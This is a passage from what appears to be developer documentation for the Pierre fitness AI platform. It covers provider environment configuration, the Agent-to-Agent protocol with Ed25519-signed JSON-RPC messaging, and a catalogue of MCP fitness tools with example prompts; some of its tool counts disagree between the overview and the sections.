- Resilience: Cache can serve stale data during provider outages
Configuration Best Practices
Cloud deployment (.envrc for GCP/AWS):
# Production: Configure only active providers
export PIERRE_DEFAULT_PROVIDER=strava
export PIERRE_STRAVA_CLIENT_ID=${STRAVA_CLIENT_ID}
export PIERRE_STRAVA_CLIENT_SECRET=${STRAVA_CLIENT_SECRET}
# Multi-provider setup
export PIERRE_DEFAULT_PROVIDER=strava
export PIERRE_STRAVA_CLIENT_ID=${STRAVA_CLIENT_ID}
export PIERRE_STRAVA_CLIENT_SECRET=${STRAVA_CLIENT_SECRET}
export PIERRE_GARMIN_CLIENT_ID=${GARMIN_CONSUMER_KEY}
export PIERRE_GARMIN_CLIENT_SECRET=${GARMIN_CONSUMER_SECRET}
export PIERRE_FITBIT_CLIENT_ID=${FITBIT_CLIENT_ID}
export PIERRE_FITBIT_CLIENT_SECRET=${FITBIT_CLIENT_SECRET}
# Development: Use synthetic provider (no secrets!)
export PIERRE_DEFAULT_PROVIDER=synthetic
# No other vars needed - synthetic provider works out of the box
Testing environments:
# Integration tests: Use synthetic provider
export PIERRE_DEFAULT_PROVIDER=synthetic
# OAuth tests: Override to real provider
export PIERRE_DEFAULT_PROVIDER=strava
export PIERRE_STRAVA_CLIENT_ID=test-client-id
export PIERRE_STRAVA_CLIENT_SECRET=test-secret
Key Takeaways
-
Pluggable architecture: Providers registered at runtime through factory pattern, no compile-time coupling.
-
Feature flags: Compile-time provider selection via
provider-strava,provider-garmin,provider-syntheticfor minimal binaries. -
Service Provider Interface (SPI):
ProviderDescriptortrait enables external providers to register without core code changes. -
Bitflags capabilities:
ProviderCapabilitiesuses efficient bitflags with combinators likeactivity_only()andfull_health(). -
1 to x providers: System supports unlimited providers simultaneously - just Strava, or Strava + Garmin + custom providers.
-
Dynamic discovery:
supported_providers()andis_supported()enable runtime introspection and automatic tool adaptation. -
Environment-based config: Cloud-native deployment using
PIERRE_<PROVIDER>_*environment variables. -
Synthetic provider: OAuth-free development provider perfect for CI/CD, demos, and rapid iteration.
-
OAuth parameters:
OAuthParamsstruct captures provider-specific OAuth differences (scope separator, PKCE). -
Factory pattern:
ProviderFactorytrait enables lazy provider instantiation with configuration injection. -
Shared interface:
FitnessProvidertrait ensures uniform request/response patterns across all providers. -
Trait objects:
Box<dyn ProviderFactory>enables storing heterogeneous factory types in registry. -
Interior mutability:
Arc<RwLock<T>>pattern allows mutation through&selfin async trait methods. -
Zero code changes: Adding providers doesn’t require modifying connection handlers, tools, or application logic.
-
Type safety: Compiler enforces that all providers implement complete
FitnessProviderinterface. -
Caching decorator:
CachingFitnessProviderwraps any provider with transparent cache-aside caching to reduce API calls. -
Cache policy control:
CachePolicyenum (UseCache,Bypass,Refresh) enables per-request cache behavior control. -
Multi-tenant cache isolation: Cache keys include tenant/user/provider for safe multi-tenant deployments.
Next Chapter: Chapter 18: A2A Protocol - Agent-to-Agent Communication - Learn how Pierre implements the Agent-to-Agent (A2A) protocol for secure inter-agent communication with Ed25519 signatures.
Previous Chapter: Chapter 17: Provider Data Models & Rate Limiting - Explore trait-based provider abstraction, unified data models, and retry logic with exponential backoff.
Chapter 18: A2A Protocol - Agent-to-Agent Communication
This chapter explores how Pierre implements the Agent-to-Agent (A2A) protocol for secure inter-agent communication. You’ll learn about the A2A protocol architecture, Ed25519 signatures, agent capability discovery, and JSON-RPC-based messaging between AI agents.
A2A Protocol Overview
A2A (Agent-to-Agent) protocol enables AI agents to communicate and collaborate:
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ Agent A │ │ Pierre │ │ Agent B │
│ (Claude) │ │ A2A Server │ │ (Other AI) │
└──────────────┘ └──────────────┘ └──────────────┘
│ │ │
│ 1. Get Agent Card │ │
├────────────────────────────────►│ │
│ (discover capabilities) │ │
│ │ │
│ 2. Register A2A Client │ │
│ (with Ed25519 public key) │ │
├────────────────────────────────►│ │
│ │ │
│ 3. Initialize session │ │
│ (negotiate protocol version) │ │
├────────────────────────────────►│ │
│ │ │
│ 4. Send message │ │
│ (with Ed25519 signature) │ │
├────────────────────────────────►│ │
│ │ 5. Forward message │
│ ├────────────────────────────────►│
│ │ │
│ 6. Stream response │ │
│◄────────────────────────────────┤ │
A2A use cases:
- Multi-agent workflows: Claude orchestrates Pierre for fitness analysis
- Task delegation: Long-running analytics tasks with progress updates
- Capability discovery: Agents learn what other agents can do
- Secure messaging: Ed25519 signatures prevent message tampering
JSON-RPC 2.0 Foundation
A2A protocol uses JSON-RPC 2.0 for all communication:
Source: src/a2a/protocol.rs:23-28
#![allow(unused)]
fn main() {
// Phase 2: Type aliases pointing to unified JSON-RPC foundation
/// A2A protocol request (JSON-RPC 2.0 request)
pub type A2ARequest = crate::jsonrpc::JsonRpcRequest;
/// A2A protocol response (JSON-RPC 2.0 response)
pub type A2AResponse = crate::jsonrpc::JsonRpcResponse;
}
Design choice: A2A reuses the same JSON-RPC infrastructure as MCP (Chapter 9), ensuring consistency and reducing code duplication.
A2A Error Types
A2A defines protocol-specific errors mapped to JSON-RPC error codes:
Source: src/a2a/protocol.rs:31-69
#![allow(unused)]
fn main() {
/// A2A Protocol Error types
#[derive(Debug, Clone, Serialize, Deserialize, thiserror::Error)]
pub enum A2AError {
/// Invalid request parameters or format
#[error("Invalid request: {0}")]
InvalidRequest(String),
/// Authentication failed
#[error("Authentication failed: {0}")]
AuthenticationFailed(String),
/// Client not registered
#[error("Client not registered: {0}")]
ClientNotRegistered(String),
/// Database operation failed
#[error("Database error: {0}")]
DatabaseError(String),
/// Client has been deactivated
#[error("Client deactivated: {0}")]
ClientDeactivated(String),
/// Rate limit exceeded
#[error("Rate limit exceeded: {0}")]
RateLimitExceeded(String),
/// Session expired or invalid
#[error("Session expired: {0}")]
SessionExpired(String),
/// Insufficient permissions
#[error("Insufficient permissions: {0}")]
InsufficientPermissions(String),
// ... more error types
}
}
Error code mapping:
Source: src/a2a/protocol.rs:76-95
#![allow(unused)]
fn main() {
impl From<A2AError> for A2AErrorResponse {
fn from(error: A2AError) -> Self {
let (code, message) = match error {
A2AError::InvalidRequest(msg) => (-32602, format!("Invalid params: {msg}")),
A2AError::AuthenticationFailed(msg) => {
(-32001, format!("Authentication failed: {msg}"))
}
A2AError::ClientNotRegistered(msg) => (-32003, format!("Client not registered: {msg}")),
A2AError::RateLimitExceeded(msg) => (-32005, format!("Rate limit exceeded: {msg}")),
A2AError::SessionExpired(msg) => (-32006, format!("Session expired: {msg}")),
A2AError::InsufficientPermissions(msg) => {
(-32008, format!("Insufficient permissions: {msg}"))
}
// ... more error mappings
};
Self {
code,
message,
data: None,
}
}
}
}
Error code ranges:
-32600to-32699: JSON-RPC reserved codes-32000to-32099: Server-defined errors-32001to-32010: A2A-specific error codes
A2A Client Structure
A2A clients have identities, public keys, and capabilities:
Source: src/a2a/auth.rs:34-68
#![allow(unused)]
fn main() {
/// A2A Client registration information
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct A2AClient {
/// Unique client identifier
pub id: String,
/// User ID for session tracking and consistency
pub user_id: uuid::Uuid,
/// Human-readable client name
pub name: String,
/// Description of the client application
pub description: String,
/// Public key for signature verification
pub public_key: String,
/// List of capabilities this client can access
pub capabilities: Vec<String>,
/// Allowed OAuth redirect URIs
pub redirect_uris: Vec<String>,
/// Whether this client is active
pub is_active: bool,
/// When this client was created
pub created_at: chrono::DateTime<chrono::Utc>,
/// List of permissions granted to this client
#[serde(default = "default_permissions")]
pub permissions: Vec<String>,
/// Maximum requests allowed per window
#[serde(default = "default_rate_limit_requests")]
pub rate_limit_requests: u32,
/// Rate limit window duration in seconds
#[serde(default = "default_rate_limit_window")]
pub rate_limit_window_seconds: u32,
}
}
Key fields:
public_key: Ed25519 public key for signature verificationpermissions: Granted access (e.g.,read_activities,write_goals)rate_limit_requests: Max requests per time windowis_active: Admin can deactivate misbehaving clients
A2A Initialization Flow
Agents initialize sessions with protocol negotiation:
Source: src/a2a/protocol.rs:105-123
#![allow(unused)]
fn main() {
/// A2A Initialize Request structure
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct A2AInitializeRequest {
/// A2A protocol version
#[serde(rename = "protocolVersion")]
pub protocol_version: String,
/// Client information
#[serde(rename = "clientInfo")]
pub client_info: A2AClientInfo,
/// Client capabilities
pub capabilities: Vec<String>,
/// Optional OAuth application credentials provided by the client
#[serde(
rename = "oauthCredentials",
default,
skip_serializing_if = "Option::is_none"
)]
pub oauth_credentials: Option<HashMap<String, crate::mcp::schema::OAuthAppCredentials>>,
}
}
Initialization request (JSON):
{
"jsonrpc": "2.0",
"method": "initialize",
"params": {
"protocolVersion": "2025-11-15",
"clientInfo": {
"name": "Claude Agent",
"version": "1.0.0"
},
"capabilities": [
"message/send",
"message/stream",
"tasks/create"
]
},
"id": 1
}
Initialization response:
Source: src/a2a/protocol.rs:162-187
#![allow(unused)]
fn main() {
impl A2AInitializeResponse {
/// Create a new A2A initialize response with server information
#[must_use]
pub fn new(protocol_version: String, server_name: String, server_version: String) -> Self {
Self {
protocol_version,
server_info: A2AServerInfo {
name: server_name,
version: server_version,
description: Some(
"AI-powered fitness data analysis and insights platform".to_owned(),
),
},
capabilities: vec![
"message/send".to_owned(),
"message/stream".to_owned(),
"tasks/create".to_owned(),
"tasks/get".to_owned(),
"tasks/cancel".to_owned(),
"tasks/pushNotificationConfig/set".to_owned(),
"tools/list".to_owned(),
"tools/call".to_owned(),
],
}
}
}
}
Capability negotiation: Server returns intersection of client-requested and server-supported capabilities.
A2A Message Structure
Messages support text, structured data, and file attachments:
Source: src/a2a/protocol.rs:189-227
#![allow(unused)]
fn main() {
/// A2A Message structure for agent communication
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct A2AMessage {
/// Unique message identifier
pub id: String,
/// Message content parts (text, data, or files)
pub parts: Vec<MessagePart>,
/// Optional metadata key-value pairs
#[serde(skip_serializing_if = "Option::is_none")]
pub metadata: Option<HashMap<String, Value>>,
}
/// A2A Message Part types
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "type")]
pub enum MessagePart {
/// Plain text message content
#[serde(rename = "text")]
Text {
/// Text content
content: String,
},
/// Structured data content (JSON)
#[serde(rename = "data")]
Data {
/// Data content as JSON value
content: Value,
},
/// File attachment content
#[serde(rename = "file")]
File {
/// File name
name: String,
/// MIME type of the file
mime_type: String,
/// File content (base64 encoded)
content: String,
},
}
}
Example message (JSON):
{
"id": "msg_abc123",
"parts": [
{
"type": "text",
"content": "Analyzing your recent running activities..."
},
{
"type": "data",
"content": {
"activities_analyzed": 10,
"average_pace": "5:30/km",
"trend": "improving"
}
}
],
"metadata": {
"agent": "Pierre",
"timestamp": "2025-11-15T10:00:00Z"
}
}
A2A Authentication
A2A supports API key authentication with rate limiting:
Source: src/a2a/auth.rs:95-113
#![allow(unused)]
fn main() {
/// Authenticate an A2A request using API key
///
/// # Errors
///
/// Returns an error if:
/// - The API key format is invalid
/// - Authentication fails
/// - Rate limits are exceeded
pub async fn authenticate_api_key(&self, api_key: &str) -> AppResult<AuthResult> {
// Check if it's an A2A-specific API key (with a2a_ prefix)
if api_key.starts_with("a2a_") {
return self.authenticate_a2a_key(api_key).await;
}
// Use standard API key authentication through MCP middleware
let middleware = &self.resources.auth_middleware;
middleware.authenticate_request(Some(api_key)).await
}
}
A2A-specific authentication:
Source: src/a2a/auth.rs:116-181
#![allow(unused)]
fn main() {
/// Authenticate A2A-specific API key with rate limiting
async fn authenticate_a2a_key(&self, api_key: &str) -> AppResult<AuthResult> {
// Extract key components (similar to API key validation)
if !api_key.starts_with("a2a_") || api_key.len() < 16 {
return Err(AppError::auth_invalid("Invalid A2A API key format").into());
}
let middleware = &self.resources.auth_middleware;
// First authenticate using regular API key system
let mut auth_result = middleware.authenticate_request(Some(api_key)).await?;
// Add A2A-specific rate limiting
if let AuthMethod::ApiKey { key_id, tier: _ } = &auth_result.auth_method {
// Find A2A client associated with this API key
if let Some(client) = self.get_a2a_client_by_api_key(key_id).await? {
let client_manager = &*self.resources.a2a_client_manager;
// Check A2A-specific rate limits
let rate_limit_status = client_manager
.get_client_rate_limit_status(&client.id)
.await?;
if rate_limit_status.is_rate_limited {
return Err(ProviderError::RateLimitExceeded {
provider: "A2A Client Authentication".to_owned(),
retry_after_secs: /* calculate from reset_at */,
limit_type: format!(
"A2A client rate limit exceeded. Limit: {}, Reset at: {}",
rate_limit_status.limit.unwrap_or(0),
rate_limit_status.reset_at.map_or_else(|| "unknown".into(), |dt| dt.to_rfc3339())
),
}
.into());
}
// Update auth method to indicate A2A authentication
auth_result.auth_method = AuthMethod::ApiKey {
key_id: key_id.clone(),
tier: format!("A2A-{}", rate_limit_status.tier.display_name()),
};
}
}
Ok(auth_result)
}
}
Rate limiting flow:
- Validate API key format: Must start with
a2a_and have minimum length - Standard authentication: Use existing API key middleware
- Lookup A2A client: Find client associated with API key
- Check rate limits: Enforce A2A-specific rate limits
- Return auth result: Include rate limit status in response
Agent Capability Discovery
Agents advertise capabilities through agent cards:
Source: src/a2a/agent_card.rs:16-34
#![allow(unused)]
fn main() {
/// A2A Agent Card for Pierre
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct AgentCard {
/// Agent name ("Pierre Fitness AI")
pub name: String,
/// Human-readable description of the agent's capabilities
pub description: String,
/// Agent version number
pub version: String,
/// List of high-level capabilities (e.g., "fitness-data-analysis")
pub capabilities: Vec<String>,
/// Authentication methods supported
pub authentication: AuthenticationInfo,
/// Available tools/endpoints with schemas
pub tools: Vec<ToolDefinition>,
/// Optional additional metadata
#[serde(skip_serializing_if = "Option::is_none")]
pub metadata: Option<HashMap<String, Value>>,
}
}
Agent card example (Pierre):
Source: src/a2a/agent_card.rs:98-135
#![allow(unused)]
fn main() {
impl AgentCard {
/// Create a new Agent Card for Pierre
#[must_use]
pub fn new() -> Self {
Self {
name: "Pierre Fitness AI".into(),
description: "AI-powered fitness data analysis and insights platform providing comprehensive activity analysis, performance tracking, and intelligent recommendations for athletes and fitness enthusiasts.".into(),
version: "1.0.0".into(),
capabilities: vec![
"fitness-data-analysis".into(),
"activity-intelligence".into(),
"goal-management".into(),
"performance-prediction".into(),
"training-analytics".into(),
"provider-integration".into(),
],
authentication: AuthenticationInfo {
schemes: vec!["api-key".into(), "oauth2".into()],
oauth2: Some(OAuth2Info {
authorization_url: "https://pierre.ai/oauth/authorize".into(),
token_url: "https://pierre.ai/oauth/token".into(),
scopes: vec![
"fitness:read".into(),
"analytics:read".into(),
"goals:read".into(),
"goals:write".into(),
],
}),
api_key: Some(ApiKeyInfo {
header_name: "Authorization".into(),
prefix: Some("Bearer".into()),
registration_url: "https://pierre.ai/api/keys/request".into(),
}),
},
tools: Self::create_tool_definitions(),
metadata: Some(Self::create_metadata()),
}
}
}
}
Tool definition in agent card:
Source: src/a2a/agent_card.rs:140-200
#![allow(unused)]
fn main() {
ToolDefinition {
name: "get_activities".into(),
description: "Retrieve user fitness activities from connected providers".to_owned(),
input_schema: serde_json::json!({
"type": "object",
"properties": {
"limit": {
"type": "number",
"description": "Number of activities to retrieve (max 100)",
"minimum": 1,
"maximum": 100,
"default": 10
},
"before": {
"type": "string",
"format": "date-time",
"description": "ISO 8601 date to get activities before"
},
"provider": {
"type": "string",
"enum": ["strava", "fitbit"],
"description": "Specific provider to query (optional)"
}
}
}),
output_schema: serde_json::json!({
"type": "object",
"properties": {
"activities": {
"type": "array",
"items": {
"type": "object",
"properties": {
"id": {"type": "string"},
"name": {"type": "string"},
"sport_type": {"type": "string"},
"start_date": {"type": "string", "format": "date-time"},
"duration_seconds": {"type": "number"},
"distance_meters": {"type": "number"},
"elevation_gain": {"type": "number"}
}
}
},
"total_count": {"type": "number"}
}
}),
examples: Some(vec![ToolExample {
description: "Get recent activities".into(),
input: serde_json::json!({"limit": 5}),
output: serde_json::json!({/* example output */}),
}]),
}
}
Agent card benefits:
- Discoverability: Agents learn what Pierre can do without documentation
- JSON Schema: Input/output schemas enable automatic validation
- Examples: Sample usage helps agents understand tool behavior
- Authentication: Agents know how to authenticate (OAuth2, API keys)
Ed25519 Signatures
A2A uses Ed25519 for message authentication:
Ed25519 key generation (conceptual from src/a2a/client.rs:226):
#![allow(unused)]
fn main() {
// Generate Ed25519 keypair for the client
let signing_key = ed25519_dalek::SigningKey::generate(&mut OsRng);
let public_key = signing_key.verifying_key();
// Store public key in A2A client record
A2AClient {
public_key: base64::encode(public_key.to_bytes()),
key_type: "ed25519".into(),
// ... other fields
}
}
Why Ed25519:
- Fast: Much faster than RSA for both signing and verification
- Small keys: 32-byte public keys (vs 256+ bytes for RSA)
- Secure: 128-bit security level, resistant to timing attacks
- Deterministic: Same message always produces same signature (unlike ECDSA)
Signature verification (conceptual):
#![allow(unused)]
fn main() {
fn verify_signature(
message: &[u8],
signature: &[u8],
public_key_base64: &str,
) -> Result<(), A2AError> {
let public_key_bytes = base64::decode(public_key_base64)?;
let public_key = VerifyingKey::from_bytes(&public_key_bytes)?;
let signature = Signature::from_bytes(signature.try_into()?);
public_key
.verify(message, &signature)
.map_err(|_| A2AError::AuthenticationFailed("Invalid signature".into()))
}
}
A2A Tasks
A2A supports long-running tasks with progress tracking:
Source: src/a2a/protocol.rs:229-250 (conceptual)
#![allow(unused)]
fn main() {
/// A2A Task structure for long-running operations
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct A2ATask {
/// Unique task identifier
pub id: String,
/// Current status of the task
pub status: TaskStatus,
/// When the task was created
pub created_at: chrono::DateTime<chrono::Utc>,
/// When the task completed (if finished)
#[serde(skip_serializing_if = "Option::is_none")]
pub completed_at: Option<chrono::DateTime<chrono::Utc>>,
/// Task result data (if completed successfully)
#[serde(skip_serializing_if = "Option::is_none")]
pub result: Option<Value>,
/// Error message (if failed)
#[serde(skip_serializing_if = "Option::is_none")]
pub error: Option<String>,
/// Client ID that created this task
pub client_id: String,
/// Type of task being performed
pub task_type: String,
}
}
Task lifecycle:
Created → Running → Completed
↘ Failed
↘ Cancelled
Task notifications: Server pushes progress updates via Server-Sent Events (SSE).
Key Takeaways
-
JSON-RPC foundation: A2A reuses the same JSON-RPC infrastructure as MCP.
-
Agent cards: Self-describing capabilities enable dynamic discovery without documentation.
-
Ed25519 signatures: Fast, secure public key authentication for agent messages.
-
Structured messages: Support text, JSON data, and base64-encoded file attachments.
-
Rate limiting: A2A clients have separate rate limits from regular API keys.
-
API key prefix: A2A API keys use
a2a_prefix to distinguish from standard API keys. -
Protocol negotiation: Clients and servers negotiate supported capabilities during initialization.
-
Long-running tasks: Async operations return task IDs with progress tracking.
-
Error codes: A2A-specific error codes in -32001 to -32010 range.
-
Tool schemas: JSON Schema for input/output enables automatic validation and client generation.
-
Multi-part messages: Single message can contain multiple content parts (text + data + files).
-
Permission model: A2A clients have granular permissions (read_activities, write_goals, etc.).
End of Part V: OAuth, A2A & Providers
You’ve completed the OAuth and provider integration section. You now understand:
- OAuth 2.0 server implementation (Chapter 15)
- OAuth 2.0 client for fitness providers (Chapter 16)
- Provider data models and rate limiting (Chapter 17)
- A2A protocol for agent communication (Chapter 18)
Next Chapter: Chapter 19: Comprehensive Tools Guide - Begin Part VI by learning about all 45+ MCP tools Pierre provides for fitness data analysis, how to use them with natural language prompts, and tool categorization.
Chapter 19: Comprehensive Tools Guide - All 47 MCP Tools
This chapter provides a complete reference to all 47 MCP tools Pierre offers for fitness data analysis. You’ll learn tool categories, natural language prompt examples, and how AI assistants discover and use these tools.
Tool Overview
Pierre provides 47 MCP tools organized in 8 functional categories:
┌────────────────────────────────────────────────────────────┐
│ Pierre MCP Tools (47 total) │
├────────────────────────────────────────────────────────────┤
│ 1. Core Fitness Tools (6) │
│ - Activities, athlete profiles, stats │
│ - Provider connection management │
├────────────────────────────────────────────────────────────┤
│ 2. Goals & Planning (4) │
│ - Goal setting, suggestions, feasibility │
│ - Progress tracking │
├────────────────────────────────────────────────────────────┤
│ 3. Performance Analysis (10) │
│ - Activity analysis, metrics calculation │
│ - Performance trends, pattern detection │
│ - Predictions, recommendations │
├────────────────────────────────────────────────────────────┤
│ 4. Configuration Management (6) │
│ - User profiles, training zones │
│ - System configuration catalog │
├────────────────────────────────────────────────────────────┤
│ 5. Fitness Configuration (4) │
│ - Fitness configuration CRUD │
│ - User-specific fitness settings │
├────────────────────────────────────────────────────────────┤
│ 6. Sleep & Recovery (5) │
│ - Sleep quality analysis │
│ - Recovery score calculation │
│ - Rest day suggestions │
├────────────────────────────────────────────────────────────┤
│ 7. Nutrition Tools (5) │
│ - Daily nutrition calculations │
│ - USDA food database search │
│ - Meal analysis │
├────────────────────────────────────────────────────────────┤
│ 8. Recipe Management (7) │
│ - Training-aware meal planning │
│ - Recipe storage and search │
└────────────────────────────────────────────────────────────┘
Tool registry: See src/mcp/schema.rs for the complete tool registration.
For detailed documentation of all 47 tools, see tools-reference.md.
1. Core Fitness Tools (6 Tools)
These tools retrieve fitness data and manage provider connections.
Connect_provider
Description: Connect to a fitness provider (Strava, Fitbit) via unified OAuth flow.
Parameters:
{
"provider": "strava" // Required: "strava" or "fitbit"
}
Natural language prompts:
- “Connect to Strava to get my activities”
- “I want to sync my Fitbit data”
- “Link my Garmin account”
Use case: Initial provider connection or adding additional providers.
Get_connection_status
Description: Check which fitness providers are currently connected.
Parameters: Optional OAuth credentials for custom apps
Natural language prompts:
- “Which providers am I connected to?”
- “Show my connection status”
- “Am I still connected to Strava?”
Use case: Verify active connections before requesting data.
Disconnect_provider
Description: Revoke access tokens for a specific fitness provider.
Parameters:
{
"provider": "strava" // Required
}
Natural language prompts:
- “Disconnect from Strava”
- “Remove my Fitbit connection”
- “Revoke Pierre’s access to my Garmin data”
Use case: Privacy management, switching accounts, troubleshooting.
2. Data Access Tools (4 Tools)
These tools fetch raw data from connected fitness providers.
Get_activities
Description: Retrieve fitness activities from a provider.
Parameters:
{
"provider": "strava", // Required
"limit": 10, // Optional: max activities (default: 10)
"offset": 0 // Optional: pagination offset
}
Natural language prompts:
- “Show me my last 20 Strava runs”
- “Get my recent Fitbit activities”
- “Fetch all my workouts from this month”
Use case: Activity listing, data exploration, trend analysis preparation.
Get_athlete
Description: Get athlete profile from a provider.
Parameters:
{
"provider": "strava" // Required
}
Natural language prompts:
- “Show my Strava profile”
- “What’s my FTP according to Strava?”
- “Get my athlete stats”
Use case: Profile information, baseline metrics (FTP, max HR, weight).
Get_stats
Description: Get aggregate statistics from a provider.
Parameters:
{
"provider": "strava" // Required
}
Natural language prompts:
- “Show my year-to-date running totals”
- “What are my all-time cycling stats?”
- “How much have I run this month?”
Use case: Summary statistics, progress tracking, milestone identification.
Get_activity_intelligence
Description: AI-powered insights and analysis for a specific activity.
Parameters:
{
"activity_id": "12345678", // Required
"provider": "strava", // Required
"include_location": true, // Optional: location intelligence
"include_weather": true // Optional: weather analysis
}
Natural language prompts:
- “Analyze my last run with weather and location insights”
- “What can you tell me about activity 12345678?”
- “Give me intelligent insights on my latest ride”
Use case: Deep activity analysis, performance insights, environmental factors.
Note: OAuth notifications are delivered via Server-Sent Events (SSE) and WebSocket connections rather than as MCP tools. See Chapter 11 (Transport Layers) for details on real-time notification delivery.
3. Intelligence & Analytics Tools (13 Tools)
These tools provide AI-powered analysis and insights.
Analyze_activity
Description: Comprehensive analysis of a single activity.
Natural language prompts:
- “Analyze my activity from yesterday”
- “What insights can you give me about my last ride?”
- “Deep dive into my marathon performance”
Use case: Post-workout analysis, identifying strengths/weaknesses.
Calculate_metrics
Description: Calculate derived metrics from activity data.
Natural language prompts:
- “Calculate my TSS for last week”
- “What’s my Normalized Power for this ride?”
- “Compute training load metrics”
Use case: Advanced metrics not provided by fitness providers.
Analyze_performance_trends
Description: Identify performance trends over time.
Natural language prompts:
- “Am I getting faster at running?”
- “Show my cycling power trends over the last 3 months”
- “Is my fitness improving?”
Use case: Long-term progress tracking, plateau detection.
Compare_activities
Description: Compare two or more activities.
Natural language prompts:
- “Compare my last two 5K runs”
- “How does today’s ride compare to last week?”
- “Show differences between these activities”
Use case: Performance comparison, identifying improvements/regressions.
Detect_patterns
Description: Detect patterns in training data.
Natural language prompts:
- “Find patterns in my running data”
- “Do I always run faster in the morning?”
- “What training patterns lead to my best performances?”
Use case: Optimization insights, habit identification.
Set_goal
Description: Set a fitness goal with target metrics.
Natural language prompts:
- “Set a goal to run a sub-20 minute 5K by June”
- “I want to cycle 200km per week”
- “Target: Complete a marathon in under 4 hours”
Use case: Goal management, motivation tracking.
Track_progress
Description: Track progress towards goals.
Natural language prompts:
- “How am I progressing towards my marathon goal?”
- “Show progress on my weekly cycling target”
- “Am I on track to hit my 5K goal?”
Use case: Goal monitoring, progress visualization.
Suggest_goals
Description: AI-suggested goals based on current fitness level.
Natural language prompts:
- “What goals should I set?”
- “Suggest realistic running goals for me”
- “What’s achievable in the next 3 months?”
Use case: Goal discovery, personalized recommendations.
Analyze_goal_feasibility
Description: Analyze if a goal is realistic given current fitness.
Natural language prompts:
- “Can I realistically run a sub-3 hour marathon?”
- “Is a 100-mile week feasible for me?”
- “Evaluate my goal to bike 50km in under 2 hours”
Use case: Goal validation, expectation management.
Generate_recommendations
Description: Generate training recommendations.
Natural language prompts:
- “What should I work on to improve my cycling?”
- “Give me recommendations for faster 10K times”
- “How can I improve my marathon performance?”
Use case: Training advice, weakness identification.
Calculate_fitness_score
Description: Calculate current fitness score.
Natural language prompts:
- “What’s my current fitness score?”
- “Calculate my fitness level”
- “How fit am I right now?”
Use case: Fitness tracking, periodization planning.
Predict_performance
Description: Predict performance for upcoming events.
Natural language prompts:
- “Predict my marathon time”
- “What pace can I sustain for a half marathon?”
- “Estimate my 5K time based on current fitness”
Use case: Race planning, pacing strategy.
Analyze_training_load
Description: Analyze training stress and recovery needs.
Natural language prompts:
- “Am I overtraining?”
- “What’s my current training load?”
- “Do I need a rest day?”
Use case: Recovery planning, injury prevention.
4. Configuration Management Tools (10 Tools)
These tools manage user profiles and training zones.
Get_configuration_catalog
Description: List all available configuration algorithms and profiles.
Natural language prompts:
- “What configuration profiles are available?”
- “Show me all training zone calculation methods”
Use case: Discovering configuration options.
Get_user_configuration
Description: Retrieve user’s current configuration.
Natural language prompts:
- “Show my current training zones”
- “What’s my configuration?”
Use case: Viewing active settings.
Update_user_configuration
Description: Update user profile (age, weight, FTP, max HR, etc.).
Natural language prompts:
- “Update my FTP to 250 watts”
- “Set my max heart rate to 185”
- “Change my weight to 70kg”
Use case: Profile updates after fitness tests.
Calculate_personalized_zones
Description: Calculate personalized training zones.
Natural language prompts:
- “Calculate my heart rate zones”
- “What are my power zones?”
- “Determine my pace zones”
Use case: Training zone setup.
5. Nutrition Tools (5 Tools)
These tools provide nutrition analysis and planning.
Calculate_daily_nutrition
Description: Calculate daily nutrition needs.
Natural language prompts:
- “How many calories should I eat?”
- “Calculate my daily protein needs”
- “What are my macros?”
Use case: Nutrition planning based on training load.
Search_food
Description: Search USDA food database.
Natural language prompts:
- “Search for ‘banana’ in the food database”
- “Find nutrition info for oatmeal”
Use case: Food logging, meal planning.
Get_food_details
Description: Get detailed nutrition info for a food.
Natural language prompts:
- “Show details for food ID 123456”
- “What nutrients are in this food?”
Use case: Detailed nutrition analysis.
Analyze_meal_nutrition
Description: Analyze complete meal nutrition.
Natural language prompts:
- “Analyze this meal: 100g chicken, 200g rice, 50g broccoli”
- “What’s the nutritional breakdown of my lunch?”
Use case: Meal logging, nutrition tracking.
6. Sleep & Recovery Tools (5 Tools)
These tools analyze sleep and recovery metrics.
Analyze_sleep_quality
Description: Analyze sleep quality and duration.
Natural language prompts:
- “How was my sleep last night?”
- “Analyze my sleep quality”
Use case: Recovery monitoring.
Calculate_recovery_score
Description: Calculate recovery score based on multiple factors.
Natural language prompts:
- “What’s my recovery score?”
- “Am I recovered enough to train hard?”
Use case: Training intensity planning.
Suggest_rest_day
Description: Suggest if a rest day is needed.
Natural language prompts:
- “Do I need a rest day?”
- “Should I take it easy today?”
Use case: Injury prevention, overtraining avoidance.
Tool Chaining Patterns
AI assistants often chain multiple tools together:
Pattern 1: Connect → Fetch → Analyze
User: "Analyze my recent running performance"
AI chains:
1. get_connection_status() // Check if connected
2. get_activities(provider="strava", limit=20) // Fetch runs
3. analyze_performance_trends() // Analyze trends
4. generate_recommendations() // Suggest improvements
Pattern 2: Configuration → Calculation → Recommendation
User: "What should my training zones be?"
AI chains:
1. get_user_configuration() // Get FTP, max HR
2. calculate_personalized_zones() // Calculate zones
3. generate_recommendations() // Training advice for each zone
Pattern 3: Goal Setting → Tracking → Prediction
User: "Set a goal and track my progress"
AI chains:
1. suggest_goals() // Suggest realistic goal
2. set_goal() // Create goal
3. track_progress() // Monitor progress
4. predict_performance() // Estimate completion
Key Takeaways
-
47 total tools: Organized in 8 functional categories for comprehensive fitness analysis.
-
Natural language: AI assistants translate user prompts to tool calls automatically.
-
Tool discovery:
tools/listprovides all tool schemas for AI assistants. -
Connection-first: Most workflows start with connection tools to establish OAuth.
-
Intelligence layer: 10 analytics tools provide AI-powered insights beyond raw data.
-
Configuration-driven: Personalized zones and recommendations based on user profile.
-
Nutrition integration: USDA food database + meal analysis for holistic health.
-
Recovery focus: Sleep and recovery tools prevent overtraining.
-
Recipe management: Training-aware meal planning and recipe storage.
-
Tool chaining: Complex workflows combine multiple tools sequentially.
-
JSON Schema: Every tool has input schema for validation and type safety.
See tools-reference.md for complete tool documentation.
Next Chapter: Chapter 20: Sports Science Algorithms & Intelligence - Learn how Pierre implements sports science algorithms for TSS, CTL/ATL/TSB, VO2 max estimation, FTP detection, and performance predictions.
Chapter 20: Sports Science Algorithms & Intelligence
